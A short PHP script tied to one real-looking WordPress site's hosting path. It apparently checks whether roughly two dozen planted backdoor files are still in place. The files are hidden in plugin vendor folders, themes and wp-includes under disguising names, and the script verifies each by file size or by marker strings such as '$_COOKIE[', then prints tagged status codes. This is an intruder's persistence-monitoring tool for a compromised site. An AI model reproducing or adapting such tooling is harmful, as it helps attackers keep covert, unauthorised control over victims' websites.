<?php $r = '/home/tamictnm/rishikeshum.co.uk'; $x = ["/wp-includes/category.php"=>"bd@@78579878@@$_COOKIE[1",
"/index.php"=>"bd@@75833567@@405",
"/wp-admin/plugin-editor.php"=>"bd@@78614144@@$_COOKIE[-",
"/wp-admin/nav-menus.php"=>"bd@@78614147@@_COOKIE[3]",
"/wp-content/plugins/kadence-blocks/vendor/vendor-prefixed/symfony/mime/Resources/bin/update.mime.types.php"=>"bd@@78614158@@1883",
"/wp-content/plugins/kadence-starter-templates/vendor/vendor-prefixed/stellarwp/uplink/src/Uplink/Pipeline/codebase.php"=>"bd@@78580235@@1873",
"/wp-content/themes/twentytwentyfive/patterns/template-home-with-sidebar-news-blog.php"=>"bd@@77443079@@8325",
"/wp-content/plugins/photo-gallery/booster/assets/js/gutenberg/gutenberg-compiled.asset.php"=>"bd@@66907405@@67",
"/wp-content/themes/kadence/inc/back-compat.php"=>"bd@@78580181@@64",
"/wp-includes/sodium_compat/lib/php72compat.php"=>"bd@@78580111@@buffer_cache",
"/wp-content/plugins/photo-gallery/frontend/models/BWGModelWidget.php"=>"bd@@39923480@@splitter_tool",
"/wp-content/plugins/photo-gallery/library/vendor/nelexa/zip/src/Model/Data/XRI.php"=>"bd@@67033620@@1700",
"/wp-content/plugins/photo-gallery/library/vendor/nelexa/zip/src/Model/Extra/Fields/madblanks.html.php"=>"bd@@70921226@@2536",
"/wp-content/plugins/photo-gallery/library/vendor/nelexa/zip/src/Util/Iterator/Password.php"=>"bd@@66403775@@629",
"/wp-content/plugins/kadence-starter-templates/vendor/vendor-prefixed/vlucas/phpdotenv/src/Store/File/set_history_type.php"=>"bd@@78580229@@1572",
"/wp-content/themes/kadence/inc/customizer/react/class-kadence-control-builder.php"=>"bd@@80252224@@1562",
"/wp-content/plugins/kadence-starter-templates/vendor/vendor-prefixed/psr/log/Psr/Log/phone.php"=>"bd@@78614160@@2533",
"/wp-content/plugins/kadence-starter-templates/vendor/vendor-prefixed/symfony/string/Resources/data/wcswidth.table.wide.php"=>"bd@@74759401@@2047",
"/wp-content/plugins/photo-gallery/library/vendor/nelexa/zip/src/IO/Stream/pms_smilies.php"=>"bd@@57465775@@1803",
"/wp-content/plugins/photo-gallery/library/vendor/nelexa/zip/src/Model/Data/XRI.php"=>"bd@@78614123@@app_initializer",
"/wp-content/themes/twentytwentyfive/patterns/cta-centered-heading.php"=>"bd@@78614150@@81",
"/wp-content/themes/kadence/bbpress/form-topic-search.php"=>"bd@@74759352@@secure_access",
"/wp-includes/blocks/comments-pagination-previous/view.archive.php"=>"bd@@66907856@@2174",
"/wp-content/plugins/photo-gallery/library/vendor/nelexa/zip/src/Exception/rate_accept01.php"=>"bd@@66508038@@536",
"/wp-content/plugins/photo-gallery/library/vendor/symfony/finder/Comparator/xmltaghandler.php"=>"bd@@63330148@@2332",
"/wp-content/plugins/kadence-starter-templates/vendor/vendor-prefixed/stellarwp/uplink/src/Uplink/Messages/Unlicensed.Available.php"=>"bd@@74732281@@2343"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!'); |